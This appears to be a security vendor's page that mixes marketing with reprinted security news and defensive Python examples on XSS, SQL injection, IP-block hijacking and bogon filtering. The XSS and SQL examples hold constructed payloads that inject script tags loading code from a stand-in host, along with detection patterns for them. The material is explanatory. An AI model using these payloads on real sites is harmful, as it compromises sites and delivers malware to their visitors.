
    Founded in 1997 and headquartered in Toronto, Ontario, Canada, Securimetric is a Canadian company which focuses on security convergence and integrated network-centric solutions. We deliver security consulting and disaster recovery services to clients in need of serious protection for enterprise systems. Our flagship Intrusion Protection System delivers cost-effective protection of enterprise networks against existing and emergent threats. The Securimetric® Intrusion Protection System is the first product on the market offering protection for both physical and information assets, the foundation of an effective integrated security infrastructure. The Securimetric IPS manages DNS, SMTP, HTTP and other traffic of interest. Beyond mere detection, the Securimetric IPS is capable of intelligent response to intrusion attempts, following evasive attackers across the network and dynamically adjusting system configuration to eliminate points of vulnerability. A wide array of plug-in component modules is available, fully customizing the Securimetric® Intrusion Protection System to meet specific operator requirements. All components are available for purchase or lease. We ensure your security investments yield bottom-line results. The Securimetric® IPS suite delivers a complete information security infrastructure, offering the most advanced security assurance capabilities available anywhere, at any price. Securimetric® backs up our IPS technology with no-nonsense security consulting and disaster recovery services. Securimetric's security professionals use proven methods to assess current systems, policies and capabilities. The other guys don't even come close, and we'll prove it with a free security probe.

    CIA CLAIMS HACKERS ATTACKING POWER GRID

    Criminals have been able to hack into computer systems via the Internet and cut power to several cities, a U.S. Central Intelligence Agency analyst said this week.

    Speaking at a conference of security professionals on Wednesday, CIA analyst Tom Donahue disclosed the recently declassified attacks while offering few specifics on what actually went wrong.

    Criminals have launched online attacks that disrupted power equipment in several regions outside of the U.S., he said, without identifying the countries affected. The goal of the attacks was extortion, he said.

    "We have information, from multiple regions outside the United States, of cyber intrusions into utilities, followed by extortion demands," he said in a statement posted to the Web on Friday by the conference's organizers, the SANS Institute. "In at least one case, the disruption caused a power outage affecting multiple cities. We do not know who executed these attacks or why, but all involved intrusions through the Internet."

    "According to Mr. Donahue, the CIA actively and thoroughly considered the benefits and risks of making this information public, and came down on the side of disclosure," SANS said in the statement.

    One conference attendee said the disclosure came as news to many of the government and industry security professionals in attendance. "It appeared that there were a lot of people who didn't know this already," said the attendee, who asked not to be identified because he is not authorized to speak with the press.

    He confirmed SANS' report of the talk. "There were apparently a couple of incidents where extortionists cut off power to several cities using some sort of attack on the power grid, and it does not appear to be a physical attack," he said.

    Hacking the power grid made front-page headlines in September when CNN aired a video showing an Idaho National Laboratory demonstration of a software attack on the computer system used to control a power generator. In the demonstration, the smoking generator was rendered inoperable.

    The U.S. is taking steps to lock down the computers that manage its power systems, however.

    On Thursday, the Federal Energy Regulatory Commission (FERC) approved new mandatory standards designed to improve cybersecurity.

    CIA representatives could not be reached immediately for comment.

    0.7.6-4

    The ICMP sensors now store historical data which can be graphed. Packet loss is now detected.

    AMAZON EC2 DOWN

    Cloud computing is all very well until someone trips over a wire and the whole thing goes dark.

    Reddit, Foursquare and Quora were among the sites affected by Amazon Web Services suffering network latency and connectivity errors this morning, according to the company’s own status dashboard.

    Amazon says performance issues affected instances of its Elastic Compute Cloud (EC2) service and its Relational Database Service, and it’s “continuing to work towards full resolution”. These are hosted in its North Virginia data centre.

    SPAMMERS ARE ABUSING XSS HOLES VIA GOOGLE

    Hackers have turned their attention to search engines in the latest attempt to invade the computers of unsuspecting Web users.

    In the past few weeks, they have taken advantage of Web pages with cross-site scripting (XSS) flaws, pages that echo untrusted input straight into their HTML or JavaScript (the language behind features like interactive maps) without escaping it, to infect thousands of sites. The poisoned pages show up in a Google search and, when clicked on, redirect the user to a malicious program that aims to steal information.

    One goal is to infect users' computers, possibly by installing a keystroke logger that captures passwords and other sensitive information.

    Seven out of 10 Web sites are vulnerable to these flaws, according to WhiteHat Security in Santa Clara. It's unclear, however, how widespread the problem is because many users don't realize they've been infected.

    Google is working on a filter that will find and automatically block such malicious Web addresses, a spokesman said Tuesday. In the meantime, it has been contacting affected organizations to advise them on how to fix their sites' vulnerabilities.

    In the latest attacks, which occurred last week, hackers built Web addresses that pointed at the vulnerable pages and carried the malicious script alongside popular search words, so that the poisoned links would be indexed and ranked high in Google searches.
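    The mechanism described above, as an added example that is not part of the original article or of any site named in it: a search page that reflects its q= parameter into the response (the XSS hole) beside the escaped version, and a small filter of the kind a crawler or site owner could run over indexed links to spot ones carrying script markup in the search term. The host names, the URLs and the marker list are constructed for the example.

```python
import html
from urllib.parse import urlparse, parse_qs

# Constructed sample URLs (not from any real site): one ordinary search and two
# of the shape described above, popular keywords padded with script markup in
# the search parameter so that the poisoned link gets indexed and ranked.
SAMPLE_URLS = [
    "http://blog.example.invalid/search?q=business+news",
    "http://blog.example.invalid/search?q=business+news"
    "%3Cscript+src%3D%22http%3A%2F%2Fbad.example.invalid%2Fx.js%22%3E%3C%2Fscript%3E",
    "http://blog.example.invalid/search?q=cheap+flights"
    "%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E",
]

def search_term(url: str) -> str:
    """The value the page would read from its q= parameter, percent-decoded."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    return qs.get("q", [""])[0]

def render_results_vulnerable(term: str) -> str:
    """Echoes the raw search term into the page: the XSS hole."""
    return f"<h1>Results for {term}</h1>"

def render_results_safe(term: str) -> str:
    """Same page with the term HTML-escaped, so markup arrives as inert text."""
    return f"<h1>Results for {html.escape(term, quote=True)}</h1>"

# Markers that have no business appearing inside a search term (assumed list).
SCRIPT_MARKERS = ("<script", "<iframe", "javascript:", "onerror=", "onload=")

def is_poisoned(url: str) -> bool:
    """True when the decoded search term carries any of the markers."""
    term = search_term(url).casefold()
    return any(marker in term for marker in SCRIPT_MARKERS)

def poisoned_urls(urls) -> list:
    """Filter a list of indexed links down to the ones carrying injected markup."""
    return [u for u in urls if is_poisoned(u)]
```

    The escaped renderer is the fix the affected sites needed; the filter is only a triage aid, since attackers can encode payloads in ways a fixed marker list misses, which is why the fix belongs in the page, not in the crawler.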

    One site that was infected, the TalkingBiz blog run by the University of North Carolina in Chapel Hill, tried to get visitors to download malicious code from a site hosted in American Samoa that has since been taken down. The location of the site does not indicate the location of the hackers, however.

    The university said it doesn't know how the site was infected or who is responsible for the attack.

    Among the retail victims named Friday were Wal-Mart, Target, Sears and Bloomingdale's, according to an independent security consultant, Dancho Danchev, who has been blogging about the attacks from the Netherlands since the beginning of March.

    The attacks were also reported by several security vendors and the Internet Storm Center at SANS, a group of researchers in Bethesda, Md.

    Wal-Mart, Target and Sears said they were aware of the attacks. Wal-Mart said that its site had not been affected and that it protects customers from "fraudulent online activity." Target said that it works with Amazon, which provides Target's Web infrastructure, to protect customers and that there is no risk to customers who visit Target.com. Sears said it is "taking the appropriate steps to ensure the Web site's security." Bloomingdale's was not available for comment.

    Media targets named by Danchev include USAToday, ABCNews, Forbes.com and News.com. USAToday reported on the attacks on Monday.

    Mass Web attacks were also reported in mid-March by Websense, a security vendor in San Diego that filters Web sites for corporations. Hackers were probing Web pages for SQL injection flaws that allowed them to get into and modify the SQL Server databases behind the vulnerable sites, said Charles Renert, senior director of advanced content research.
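    What "making changes to the databases behind the sites" looks like in code, as an added example that is neither Websense's analysis nor code from any affected site. It uses an in-memory SQLite table standing in for a site's content database; the table, its rows, the payload and the script host are all constructed for the example.

```python
import sqlite3

# Constructed payload in the style of the mass injection described above: it
# closes the intended lookup, then appends a remote script tag to every row
# of a text column that the site later renders into its pages.
INJECTED_TAG = '<script src="http://bad.example.invalid/x.js"></script>'
PAYLOAD = f"1; UPDATE pages SET body = body || '{INJECTED_TAG}'; --"

def fresh_db() -> sqlite3.Connection:
    """Tiny in-memory stand-in for a site's content database (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    con.executemany("INSERT INTO pages (id, body) VALUES (?, ?)",
                    [(1, "<p>Welcome</p>"), (2, "<p>About us</p>")])
    con.commit()
    return con

def lookup_vulnerable(con: sqlite3.Connection, page_id: str) -> None:
    """Builds the statement by string concatenation, so page_id is parsed as SQL.
    executescript() is used because, like the database servers behind the
    attacked sites, it accepts several statements in one request; sqlite3's
    plain execute() would refuse the second statement and mask the bug."""
    con.executescript("SELECT body FROM pages WHERE id = " + page_id)

def lookup_safe(con: sqlite3.Connection, page_id: str) -> list:
    """Binds page_id as a value: the payload cannot become SQL, it just matches nothing."""
    return con.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchall()

def bodies(con: sqlite3.Connection) -> list:
    """Current page bodies in id order, for inspecting what the injection did."""
    return [row[0] for row in con.execute("SELECT body FROM pages ORDER BY id")]

def infected_pages(con: sqlite3.Connection) -> list:
    """Detection side: ids of rows that now carry the injected tag."""
    rows = con.execute("SELECT id FROM pages WHERE instr(body, ?) > 0 ORDER BY id",
                       (INJECTED_TAG,))
    return [row[0] for row in rows]
```

    The parameterized lookup is the whole fix: the same payload that rewrites every row through the concatenated query returns an empty result when bound as a value. A query like infected_pages() is also the quickest way to check a content database after a site has been named in one of these attacks.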

    DISGRUNTLED EMPLOYEE REMOTELY DISABLES CARS

    Austin police arrested Omar Ramos-Lopez, 20, on Wednesday, charging him with felony breach of computer security.

    Ramos-Lopez used a former colleague's password to deactivate starters and set off car horns, police said. Several car owners said they had to call tow trucks and were left stranded at work or home.

    Police say Ramos-Lopez, fired from a Texas auto dealership, used an Internet service to remotely disable ignitions and set off car horns of more than 100 vehicles sold at his former workplace.

    "He caused these customers, now victims, to miss work," Austin police spokeswoman Veneza Aguinaga said. "They didn't get paid. They had to get tow trucks. They didn't know what was going on with their vehicles."

    Ramos-Lopez was in the Travis County Jail on Wednesday with bond set at $3,000.

    The Texas Auto Center dealership in Austin installs GPS devices that can prevent cars from starting.

    The system is used to repossess cars when buyers are overdue on payments, said Jeremy Norton, a controller at the dealership where Ramos-Lopez worked. Car horns can be activated when repo agents go to collect vehicles and believe the owners are hiding them.

    "We are taking extra measures to make sure this never happens again," Norton said.

    Starting in mid-February, dealership employees noticed unusual changes to their business records. Someone was going into the system and changing customers' names, such as having dead rapper Tupac Shakur buying a 2009 vehicle, Norton said.

    Soon, customers began calling saying their cars wouldn't start, or that their horns were going off incessantly, forcing them to disengage the battery. Norton said the dealership originally thought the cars had mechanical problems.

    Then employees noticed someone had ordered $130,000 in parts and equipment from the company that makes the GPS devices.

    Police said they were able to trace the sabotage to Ramos-Lopez's computer, leading to his arrest.

    Norton said Ramos-Lopez didn't seem unusually upset about being fired.

    "I think he thought what he was doing was a harmless prank," Norton said. "He didn't see the ramifications of it."

    That's what you get for leaving your car open to remote exploitation. These guys use the devices to get more money out of people, now they have seen that technology is a two-way street. Think about that next time you let a third party remotely control your vehicle.

    GOOGLE THREATENS TO BACK OUT OF CHINA

    Google said that it would stop cooperating with Chinese Internet censorship and consider shutting down its operations in the country altogether, citing assaults from hackers on its computer systems and China’s attempts to “limit free speech on the Web.”

    The move, if followed through, would be a highly unusual rebuke of China by one of the largest and most admired technology companies, which had for years coveted China’s 300 million Web users.

    Since arriving here in 2006 under an arrangement with the government that purged its Chinese search results of banned topics, Google has come under fire for abetting a system that increasingly restricts what citizens can read online.

    Google linked its decision to sophisticated cyberattacks on its computer systems that it suspected originated in China and that were aimed, at least in part, at the Gmail user accounts of Chinese human rights activists.

    Those attacks, which Google said took place last week, were directed at some 34 companies or entities, most of them in Silicon Valley, California, according to people with knowledge of Google's investigation into the matter. The attackers may have succeeded in penetrating elaborate computer security systems and obtaining crucial corporate data and source code, though Google said it did not itself suffer losses of that kind.

    While the scope of the hacking and the motivations and identities of the hackers remained uncertain, Google’s response amounted to an unambiguous repudiation of its own five-year courtship of the vast China market, which most major multinational companies consider crucial to their growth prospects. It is also likely to enrage the Chinese authorities, who deny that they censor the Internet and are accustomed to having major foreign companies adapt their practices to Chinese norms.

    The company said it would try to negotiate a new arrangement to provide uncensored results on its search site, google.cn. But that is a highly unlikely prospect in a country that has the most sweeping Web filtering system in the world. Google said it would otherwise cease to run google.cn and would consider shutting its offices in China, where it employs some 700 people, many of them highly compensated software engineers, and has an estimated $300 million in annual revenue.

    Google executives declined to discuss in detail their reasons for overturning their China strategy. But despite a costly investment, the company has a much smaller share of the search market here than it does in other major markets, commanding only about one in three searches by Chinese. The leader in searches, Baidu, is a Chinese-run company that enjoys a close relationship with the government.

    Google executives have privately fretted for years that the company’s decision to censor the search results on google.cn, to filter out topics banned by Chinese censors, was out of sync with the company’s official motto, “Don’t be evil.”

    “We have decided we are no longer willing to continue censoring our results on google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all,” David Drummond, senior vice president for corporate development and the chief legal officer, said in a statement.

    Wenqi Gao, a spokesman for the Chinese Consulate in New York, said he did not see any problems with google.cn. “I want to reaffirm that China is committed to protecting the legitimate rights and interests of foreign companies in our country,” he said in a phone interview.

    In China, search requests that include words like “Tiananmen Square massacre” or “Dalai Lama” come up blank. In recent months, the government has also blocked YouTube, Google’s video-sharing service.

    While Google’s business in China is now small, analysts say that the country could soon become one of the most lucrative Internet and mobile markets, and a withdrawal would significantly reduce Google’s long-term growth.

    “The consequences of not playing the China market could be very big for any company, but particularly for an Internet company that makes its money from advertising,” said David B. Yoffie, a Harvard Business School professor. Mr. Yoffie said advertising played an even bigger role in the Internet in China than it did in the United States. At the time of its arrival, the company said that it believed that the benefits of its presence in China outweighed the downside of being forced to censor some search results here, as it would provide more information and openness to Chinese citizens. The company, however, has repeatedly said that it would monitor restrictions in China.

    Google’s announcement Tuesday drew praise from free speech and human rights advocates, many of whom had criticized the company in the past over its decision to enter the Chinese market despite censorship requirements.

    “I think it’s both the right move and a brilliant one,” said Jonathan Zittrain, a legal scholar at Harvard’s Berkman Center for Internet and Society.

    IPV4 ADDRESS SPACE HIJACKING

    "Where we find evidence that there has been a fraudulent transfer we will try to go back through history and find out who has the earliest established legitimate use of the address space."

    --ARIN President Ray Plzak

    Recently an expanse of Internet address space belonging to the County of Los Angeles was put to some uses that had little to do with effective municipal governance. Some county addresses inexplicably began hosting porn websites, while others generated suspicious scanning activity that tripped intrusion detection systems around the net. And then there was the spam, suddenly oozing from the county's cyberspace like sludge moving down the Los Angeles river after a rain -- low-interest mortgages, bargain ink jet cartridges, an abundance of "sizzling teens" in adult situations.

    It turns out the official records of the address block had been doctored, and L.A. County no longer owned the space -- at least as far as the rest of the world was concerned. All 65,534 addresses now belonged to one Emil Kacperski, the 20-something owner of a small unincorporated hosting company in Northern California. No one was more surprised than county officials, who'd been using the space on an internal county-wide network since 1995. "We found out when we got a call from some outfit overseas, saying they were being hacked and they investigated the IP address and it was one of ours," says Dennis Shelley, associate CIO for the county. "We followed up on it, and we found out that it had been hijacked."

    Los Angeles County had been hit by a growing type of hi-tech fraud, in which large, and usually dormant, segments of the Internet's address space are taken away from their registered users through an elaborate shell game of forged letters, ephemeral domain names and anonymous corporate fronts. The patsies in the scheme are the four non-profit registries that parcel out address space around the world and keep track of who's using it. The prizes are the coveted "Class B" or "/16" (read "slash-sixteen") address blocks that Internet authorities passed out like candy in the days when address space was bountiful, but are harder to get legitimately now.

    The most rapacious consumers of the stolen address space are spammers trying to stay a step ahead of anti-spam blacklists. A /16 provides a lot of addresses to hide behind, a lot of launch pads for unwanted e-mail, squats for hastily-erected spamvertised websites, and attack points from which one can scan the Internet for misconfigured proxy servers-- useful for laundering even more spam. Some anti-spam investigators believe an underground economy exists in which a large block of address space is broken down and re-sold in smaller chunks like a boosted Acura in a chop-shop. "Money is changing hands," says Kai Schlichting, a veteran network engineer who tracks down stolen IP space in his spare time. "I wouldn't be surprised if you could sell a /16 for $100,000 in bits and pieces."

    Hijacking an IP block is cheap, and it bypasses conservation measures imposed by the regional registries: to get a large allocation legally, one must first demonstrate an immediate need for the space; it's not enough to want it. Then you have to pay the registry as much as $10,000 in fees. In contrast, to snake someone else's domain all the scamster has to do is write a letter on fake company letterhead changing the contact information for the allocation, or in some circumstances just forge an e-mail message from the owner. Investigators say that some hijackers have resorted to cloning an entire company by incorporating under a similar name.

    Kacperski, owner of the Walnut Creek, Calif. hosting company Atrivo, says he acquired L.A. County's space after becoming frustrated by the cost and bureaucracy of getting a larger block through approved channels. In a telephone interview, the entrepreneur admitted that the /16 wasn't his, but he denied taking it himself. He says he purchased it from a gray-market broker he met online, who claimed to have the right to sell the block.

    "He called it 'borrowed space,'" says Kacperski. "We ended up paying the person for the block and he ended up [transferring] it to us... He assured us there'd be no problems." The price, he claims, was a paltry $500, transferred through PayPal, though he was instructed to use only a tiny fraction of the space.

    Regardless of who stole it, Los Angeles County quickly got its space back. But elsewhere the scam has intensified in recent months, with at least seven large allocations found newly-diverted, and countless other cases suspected. Last month anti-spam groups and concerned network operators formed a private mailing list to investigate the phenomenon outside the view of cyberjackers. "There's anything up to 100 of these blocks out there on the loose," estimates Richard Cox, an IT forensics guru with Mandarin Technology in the U.K. "That's the magnitude that we're dealing with here."

    Network operators were galvanized by a particularly brazen case in April, when a trail of spam led to the discovery that no less than six /16s -- nearly 400,000 addresses -- had been misappropriated from Trafalgar House, a British construction and shipping conglomerate that's now part of Aker Kvaerner, headquartered in Norway. From the U.K., Cox discovered that the perpetrators conned the American Registry for Internet Numbers (ARIN) into changing the contact information for the space. One of the /16s was traced to a Dutch spammer, and the other five to a mysterious company called "Fedfinancial Corp."

    Fedfinancial managed to convince ARIN that it had been contracted to provide network management services for Trafalgar. ARIN won't say exactly how it was swindled, but registration records show the grifters had an authentic-looking e-mail address at a newly-minted "traf-infosystems.net" domain, and a genuine street address with matching voice and fax telephone numbers. But the phone numbers ring to Nevada and Offshore Business Formation, a company that sets up corporations for a fee, and takes orders over the Web. Public records show that they incorporated Fedfinancial as a Nevada corporation last January, on behalf of an unnamed client. The street address is also theirs.

    ARIN president Ray Plzak says the registry doesn't comment on specific cases, but acknowledged that address space hijacking is a problem. "We have measures in place to detect these kinds of things, and we have a set of procedures that we follow to verify information, and we're continuously looking into ways of improving that," says Plzak. "No procedure is ever 100% perfect, and we recognize that."

    Once the ARIN record for a block of space has been tweaked, the new "owner" can show it to a network access provider as proof that he has the right to use the addresses. Kacperski found three providers for his purloined L.A. County block; anyone who questioned his sudden good fortune was treated to a tall tale about an old friend who bequeathed Kacperski the mammoth space when his company went bankrupt.

    Coincidentally, one of the providers, New York-based networking firm nLayer, also wound up routing a /16 that another customer took from the Italian logistics firm Zust-Ambrosetti in January. But nLayer insists it's doing everything reasonable to avoid harboring misappropriated space. "Obviously we don't want to be routing any IP blocks that are potentially stolen." says an nLayer representative who identified himself as Richard Steenbergen. "But nothing really shows up as a red flag when someone is listed as a contact on the block."

    Anti-spammers argue that access providers should be more skeptical when someone comes in with a ridiculously large allocation. "If it's a customer connecting with T1 and walking in with a /16, or two or three of them, this is something that should set off some alarm bells," says Schlichting. But additional vigilance goes against an access provider's financial interest -- they make money by connecting people, not by turning them away.
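    The "alarm bells" Schlichting describes can be written down as checks an access provider runs before routing a customer-supplied block. The following is an added example, not a tool from the article or from any registry or provider it names: it sizes the prefix against the customer's link, compares the registry's organisation name with the customer's, and flags a contact record that changed recently, the pattern in the Trafalgar House and L.A. County cases. The registry snapshot, the prefixes and the two thresholds are constructed for the example and are assumptions, not registry policy.

```python
import ipaddress
from datetime import date

# Constructed registry snapshot (invented records, not ARIN data): the
# organisation each block is registered to and when its contact record
# last changed.
REGISTRY = {
    "10.20.0.0/16":  {"org": "Example County Government", "contact_changed": date(2004, 4, 10)},
    "172.20.0.0/20": {"org": "Hypothetical Hosting Inc",  "contact_changed": date(1998, 6, 1)},
}

# Assumed rules of thumb, not registry policy: how many addresses a link of a
# given speed plausibly serves, and how recent a contact change counts as fresh.
ADDRESSES_PER_MBPS = 64      # a T1 (1.5 Mbps) justifies roughly a /25, not a /16
FRESH_CHANGE_DAYS = 90

def covering_record(net: ipaddress.IPv4Network, registry: dict):
    """Registry record for net itself or for the smallest block containing it."""
    candidates = [p for p in registry if net.subnet_of(ipaddress.ip_network(p))]
    if not candidates:
        return None
    return registry[max(candidates, key=lambda p: ipaddress.ip_network(p).prefixlen)]

def vet_customer_prefix(prefix: str, claimed_org: str, link_mbps: float,
                        today: date, registry: dict = REGISTRY) -> list:
    """Flags to raise before routing a customer-supplied prefix. Empty list = no alarm."""
    net = ipaddress.ip_network(prefix, strict=True)
    flags = []
    if net.num_addresses > link_mbps * ADDRESSES_PER_MBPS:
        flags.append(f"{prefix} ({net.num_addresses} addresses) behind a {link_mbps} Mbps link")
    rec = covering_record(net, registry)
    if rec is None:
        flags.append(f"no registry record covers {prefix}")
        return flags
    if rec["org"].casefold() != claimed_org.casefold():
        flags.append(f"registered to {rec['org']!r}, customer claims {claimed_org!r}")
    age = (today - rec["contact_changed"]).days
    if age <= FRESH_CHANGE_DAYS:
        flags.append(f"contact record changed {age} days ago; confirm with the prior contact")
    return flags
```

    The name comparison would not have caught the Trafalgar House case on its own, since the hijackers cloned the company's identity; the recent-change check is the one that fires there, and the right response to it is a call to the contact listed before the change, not the one listed now.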

    And until spammers discovered the technique, IP hijacking was largely considered a dishonest but forgivable path to acquiring old, unused address space belonging to defunct companies. The perpetrators were what the Spamhaus Project describes as "a few crufty geeks" in search of "cheap digs." The scam is victimless in that it normally targets dormant allocations that are otherwise going to waste, in many cases taking blocks of space that belong to defunct companies, or, like the Trafalgar House space, have long faded from corporate memory.

    But like the mob moving in on a neighborhood poker game, spammers have turned a once-harmless misdemeanor into an organized and well-funded scheme. Internet defenders shudder at the thought of large portions of the net's real estate under the control of anonymous rogue entities. "There's no accountability. You don't know who really owns this particular address space. You have no way of finding out," says Schlichting. Some even worry that malefactors will go a step further, and begin hijacking address space that's already in active use. "This whole episode has identified huge weaknesses in the Internet's own infrastructure," says Cox. "What we've seen happen is trivial compared to what we've seen possible."

    For now, attention is turning to what the regional registries could or should do to stop the practice, and ARIN has begun reviewing old records for signs of chicanery. "Where we find evidence that there has been a fraudulent transfer... we will remove that information and try to go back through history, if you will, and try and find out who has the earliest established legitimate use of the address space," says Plzak. What that history might yield has some network operators nervous; some of the space appropriated by those "crufty geeks" has been stratified into legitimacy by the passage of time. This week network operators on the NANOG mailing list began debating whether benevolent squatters should be granted some kind of amnesty from the coming "witch hunt."

    As for Kacperski, last week he received approval from ARIN for a new block of space that he can rightfully call his own. "There are forms, there are a lot of procedures, and we had to pay $2,500... This is not an easy thing to do," he says. His new block is a /20, which means he has a little over 4,000 IP addresses for his hosting company. That's not bad, but it's a long fall from the heady days when he had enough virtual real estate to serve the City of Angels.

    BIG-TIME CREDIT CARD HACKER BUSTED

    Albert Gonzalez will spend 15 to 25 years in prison for masterminding one of the two largest identity thefts in U.S. history.

    According to a plea agreement announced today, he will plead guilty by Sept. 11 to 19 counts in Massachusetts related to the theft of 41 million credit-card numbers from retailers TJX Cos, BJ's Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, Forever 21 and DSW.

    The plea deal resolves related charges in federal court in New York.

    But the 28-year-old former government informant from Miami, who is in jail already, still faces federal charges in New Jersey for allegedly being the mastermind of a separate case involving the theft of 130 million credit and debit card numbers from credit-card processor Heartland Payment Systems and retail chains 7-Eleven and Hannaford Brothers Co. He and two unidentified Russians were indicted Aug. 17 on those charges.

    DNA EVIDENCE CAN BE FAKED

    Scientists have shown it is possible to fake DNA evidence, potentially undermining the credibility of the key forensic technique.

    Using equipment found in labs up and down the country, they obliterated all traces of DNA from a blood sample and added someone else's genetic material in its place.

    The swap was so successful it fooled scientists who carry out DNA fingerprinting for U.S. courts.

    The development raises the possibility of samples of blood or saliva being planted at crime scenes, leading to the innocent being wrongly convicted and the guilty going free.

    Israeli researcher Dan Frumkin, who produced the bogus DNA, said: 'If you can fake blood, saliva or any other tissue, you can engineer a crime scene. Any biology undergraduate could perform this.'

    Dr Frumkin's company, which has made a kit he claims can distinguish real DNA samples from fake ones, used two techniques to fabricate the evidence.

    In the first, they extracted minute samples of genetic material from strands of hair and multiplied them many times over.

    They then inserted this DNA into blood cells that had been purged of all genetic clues to their real owner.

    The blood then contained the genetic fingerprint of the first person, the journal Forensic Science International: Genetics reports.

    In theory, it could then be planted at the scene of a crime.

    DNA material can be gathered from an empty wine glass or cigarette butts.

    Hair, chewing gum, cigarette butts and mugs and glasses could all provide an initial DNA sample.

    The company has also developed a more complicated technique, which relies on knowledge of the DNA fingerprint - a 'bar code' of genetics from 20 set spots on a person's DNA.

    The scientists built a 'library' containing hundreds of DNA snippets covering all the genetic codes that crop up at the set points scrutinised by police. To make a sample matching a particular fingerprint, they just dipped into their library for the right combination and mixed them in a test-tube.

    The researchers believe eventually the technology will be used by criminals.

    They warned: 'DNA evidence is key to the conviction or exoneration of suspects of various types of crime, from theft to rape and murder. However, the disturbing possibility that DNA evidence can be faked has been overlooked.'

    DENIAL-OF-SERVICE ATTACKS

    A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. The term is generally used with regard to computer networks, but is not limited to this field; it is also used, for example, in reference to CPU resource management.

    One of the most frightening things that can happen to a server is to be hit with a Distributed Denial of Service (DDoS) attack. For the company, organization, or individual responsible for the website or multiple sites being victimized, it can generate a feeling of helplessness. Although there may not be much you can do to avoid becoming the target of such an attack, there are steps you can take to reduce the likelihood that your server will be brought to its knees.

    DDoS is a specific type of Denial of Service (DoS) attack, often aimed at large websites and networks. A regular DoS attack involves one computer or server attacking another, flooding it with more requests than it can handle, and effectively crippling it.

    A DDoS attack is called "distributed" because it involves multiple attacking machines, sometimes hundreds or even thousands. Multiple remote systems flood the bandwidth or resources of the target, making it difficult to pinpoint any one machine as the source of the attack. In most cases, the owners of the attacking machines are not even aware that they are being used to attack a server. The attack software is distributed using malware, such as trojans, and the infected machines are herded into botnets. Unlike a normal DoS attack, a DDoS does not have to use spoofed IP addresses, since the attacking machines are real, legitimate hosts.

    Many types of intrusions and malware attacks are random and not directed specifically at the victim. They are crimes of circumstance. With DDoS attacks, the intent is very specific, and the victim is carefully targeted. For this reason, the victim servers are usually owned by high-profile corporations and organizations, and the attackers often have political, economic, or social agendas. Most importantly, many of these attacks have no further end game: there is no technical goal beyond the outage itself, and the attack is designed simply to send a message to the target. Extortion, discussed below, is the main exception.

    A recently publicized DDoS case involved an attack on the United States Copyright Office, which took down "copyright.gov". The attackers, known simply as "Anonymous", have also attacked the RIAA website and other sites with an interest in fighting copyright infringement. The attacks coincided with the shutdown of LimeWire, a popular file-sharing service.

    There have also been recent publicized DDoS attacks that were direct extortion attempts.

    Anyone with an Internet-connected server could become the target of a DDoS. Because just about anyone can have an agenda against a website of any kind, you cannot assume that your server will be immune to attacks. Any Internet-connected machine, including servers and home computers, can also be used as an "agent" that delivers the attack. Finally, industry and public infrastructure may be affected, since it is usually large sites, governments, and corporations that come under attack.

    Protecting the interests of your clients and customers is very important. If you run large enterprise servers, it may be worth hiring a network security consultant to make sure your servers are as secure as possible.

    Unfortunately, when someone decides to attack your server, there may be little you can do to stop them. In such cases, the best you can do is to try to limit the damage they are able to do, gather evidence against them, and report them to law enforcement agencies. With careful prevention techniques in place, you can discourage attackers from targeting you when they see that attacks do not cause significant damage.

    One common method of attack involves saturating the target (victim) machine with external communication requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented in one of three ways: forcing the targeted computers to reset or crash; consuming their resources so that they can no longer provide their intended service; or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

    Denial-of-service attacks are considered violations of the IAB's Internet proper use policy (RFC 1087), and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.

    Securimetric has established peering connections with multiple core Internet Service Providers to provide multi-gigabit attack protection. Each peer is closely monitored and continuously evaluated in order to deliver the fastest response time to customers' critical and latency-sensitive applications.

    At the Securimetric border, traffic is filtered for bandwidth floods using wire-speed Access Control Lists. Securimetric also maintains lists of bogon IP ranges (addresses that should never appear as a source on the public Internet) and of known infected hosts, which are filtered at this layer as well.
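    The border ACL described above is a stateless decision per packet: drop anything whose source is a bogon prefix or a known infected host, forward the rest. The block below is an added example modelling that decision in Python; it is not Securimetric's code, its bogon list is deliberately abbreviated (a real deployment pulls a maintained feed and would also cover the documentation ranges, which are kept "public" here so that the sample clients have somewhere to come from), and the infected-host list and packet sample are constructed for the example.

```python
import ipaddress

# Abbreviated bogon list (RFC 1918, loopback, link-local, CGNAT, multicast,
# reserved, and the IPv6 equivalents). Assumption: a production ACL is built
# from a maintained bogon feed rather than a hard-coded tuple like this one.
BOGON_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]

# Constructed "infected hosts" list: sources previously seen attacking.
INFECTED_HOSTS = {ipaddress.ip_address(a) for a in ("198.51.100.77", "203.0.113.200")}


def classify_source(src):
    """Return 'bogon', 'infected' or 'allow' for a packet's source address.
    A bogon source can only be spoofed (or leaked by a misconfigured network),
    so dropping it costs nothing in legitimate traffic."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return "bogon"  # unparsable source: treat as junk
    if any(addr in net for net in BOGON_NETS):
        return "bogon"
    if addr in INFECTED_HOSTS:
        return "infected"
    return "allow"


def apply_border_acl(packets):
    """Filter (src, dst, proto) tuples; returns (forwarded, dropped_by_reason)."""
    forwarded, dropped = [], {"bogon": 0, "infected": 0}
    for pkt in packets:
        verdict = classify_source(pkt[0])
        if verdict == "allow":
            forwarded.append(pkt)
        else:
            dropped[verdict] += 1
    return forwarded, dropped


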